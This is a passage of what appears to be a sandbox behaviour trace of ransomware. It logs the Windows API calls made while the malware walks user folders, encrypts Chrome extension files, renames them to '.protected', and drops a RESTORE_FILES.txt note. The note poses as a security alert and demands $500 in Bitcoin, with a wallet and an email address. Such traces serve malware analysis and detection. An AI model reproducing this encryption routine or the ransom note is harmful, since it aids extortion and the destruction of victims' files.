(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.656] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.656] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.656] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.656] CloseHandle (hObject=0x164) returned 1 [0080.656] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0080.656] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro") returned 141 [0080.657] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0080.657] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*") returned 143 [0080.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.657] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.657] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.657] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.657] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.657] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\.") returned 143 [0080.657] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.657] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.657] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.657] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.657] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.657] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.657] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\..") returned 144 [0080.657] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.657] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.657] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.657] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.657] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.657] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.657] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.657] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.657] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.658] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.658] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.658] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0080.658] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.658] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xaf, lpOverlapped=0x0) returned 1 [0080.659] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff51, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.659] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xaf, lpOverlapped=0x0) returned 1 [0080.659] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.659] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.659] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.659] CloseHandle (hObject=0x168) returned 1 [0080.659] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.protected") returned 165 [0080.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.protected")) returned 1 [0080.660] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.660] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.660] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0080.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.660] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.660] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.661] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.661] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.661] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.661] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.661] CloseHandle (hObject=0x164) returned 1 [0080.661] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0080.661] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0080.661] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru") returned 141 [0080.661] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0080.661] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0080.661] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*") returned 143 [0080.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.663] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.663] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.663] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.663] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.663] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.663] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\.") returned 143 [0080.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.663] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.663] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.663] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.663] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.663] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.663] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.663] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\..") returned 144 [0080.663] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.664] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.664] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.664] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.664] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.664] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.664] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0080.664] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.664] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0080.665] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.665] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0080.665] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.665] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.666] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.666] CloseHandle (hObject=0x168) returned 1 [0080.666] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.protected") returned 165 [0080.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.protected")) returned 1 [0080.666] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.666] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.666] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0080.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.667] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.667] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.668] lstrlenA 